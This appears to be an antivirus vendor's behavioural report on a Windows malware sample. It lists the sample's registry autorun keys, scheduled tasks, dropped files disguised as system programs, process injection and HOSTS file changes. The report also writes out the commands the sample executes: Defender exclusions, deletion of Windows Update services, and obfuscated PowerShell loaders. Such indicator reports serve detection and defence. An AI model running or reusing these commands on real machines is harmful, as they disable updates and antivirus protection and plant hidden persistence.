Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'dllhost' = '%ALLUSERSPROFILE%\Microsoft\dllhost.exe'
Creates or modifies the following files
- <SYSTEM32>\tasks\dllhost
- <SYSTEM32>\tasks\update
- <SYSTEM32>\tasks\dialersvc32
- <SYSTEM32>\tasks\dialersvc64
Malicious functions
Injects code into
the following system processes:
- <SYSTEM32>\conhost.exe
Modifies file system
Creates the following files
- %WINDIR%\windows defender.exe
- %TEMP%\_mei23802\python311.dll
- %TEMP%\_mei23802\pywin32_system32\pywintypes311.dll
- %TEMP%\_mei23802\select.pyd
- %TEMP%\_mei23802\sqlite3.dll
- %TEMP%\_mei23802\unicodedata.pyd
- %TEMP%\_mei23802\win32crypt.pyd
- %TEMP%\_mei23802\base_library.zip
- %TEMP%\_mei23802\_bz2.pyd
- %TEMP%\_mei23802\config.json
- %TEMP%\_mei23802\getpass
- %TEMP%\_mei23802\injection-obfuscated.js
- %ALLUSERSPROFILE%\microsoft\dllhost.exe
- %TEMP%\tmpcdf8.tmp.bat
- nul
- %TEMP%\_mei23802\libssl-1_1.dll
- %TEMP%\_mei23802\libcrypto-1_1.dll
- %TEMP%\_mei23802\_ssl.pyd
- %TEMP%\_mei23802\_sqlite3.pyd
- %TEMP%\_mei23802\_socket.pyd
- %TEMP%\_mei23802\_queue.pyd
- %TEMP%\_mei23802\_lzma.pyd
- %TEMP%\_mei23802\_hashlib.pyd
- %TEMP%\_mei23802\_decimal.pyd
- %TEMP%\_mei23802\camera
- %TEMP%\_mei23802\vcruntime140.dll
- %TEMP%\_mei23802\pil\_webp.cp311-win_amd64.pyd
- %TEMP%\_mei23802\pil\_imagingtk.cp311-win_amd64.pyd
- %TEMP%\_mei23802\pil\_imagingcms.cp311-win_amd64.pyd
- %TEMP%\_mei23802\pil\_imaging.cp311-win_amd64.pyd
- %WINDIR%\windows update.exe
- %WINDIR%\dllhost.exe
- %CommonProgramFiles%\system\updater.exe
- %TEMP%\ezvghoxj.tmp
Deletes the following files
- %WINDIR%\dllhost.exe
Modifies the HOSTS file.
Miscellaneous
Creates and executes the following
- '%WINDIR%\windows defender.exe'
- '%WINDIR%\dllhost.exe'
- '%WINDIR%\windows update.exe'
- '%ALLUSERSPROFILE%\microsoft\dllhost.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "PAAjAGkAZwBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AbABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwA...' (with hidden window)
- '%WINDIR%\windows defender.exe' ' (with hidden window)
- '%WINDIR%\dllhost.exe' ' (with hidden window)
- '%WINDIR%\windows update.exe' ' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+'T'+'W'+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+'d'+''+'i'+'a'+'l'+''+[Char](101)+'rs'+[Char...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('d'+[Char](105)+''+'a...' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "PAAjAGkAZwBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AbABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwA...
- '<SYSTEM32>\powercfg.exe' /x -standby-timeout-dc 0
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
- '<SYSTEM32>\schtasks.exe' /create /f /sc onlogon /rl highest /ru System /tn Update /tr "'%CommonProgramFiles%\System\Updater.exe'"
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
- '<SYSTEM32>\powercfg.exe' /x -standby-timeout-ac 0
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
- '<SYSTEM32>\sc.exe' stop dosvc
- '<SYSTEM32>\sc.exe' stop bits
- '<SYSTEM32>\dialer.exe'
- '<SYSTEM32>\powercfg.exe' /x -hibernate-timeout-dc 0
- '<SYSTEM32>\sc.exe' stop WaaSMedicSvc
- '<SYSTEM32>\powercfg.exe' /x -hibernate-timeout-ac 0
- '<SYSTEM32>\sc.exe' stop UsoSvc
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' <#cwnffrq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([Syste...
- '<SYSTEM32>\cmd.exe' /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
- '<SYSTEM32>\cmd.exe' /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentContr...
- '<SYSTEM32>\timeout.exe' 7
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tmpCDF8.tmp.bat""
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
- '<SYSTEM32>\schtasks.exe' /create /tn dllhost /tr "%ALLUSERSPROFILE%\Microsoft\dllhost.exe" /st 21:02 /du 23:59 /sc daily /ri 1 /f
- '<SYSTEM32>\sc.exe' stop wuauserv
- '<SYSTEM32>\dllhost.exe' /Processid:{701f1109-c9cd-4abc-a447-4abf7ed32c38}
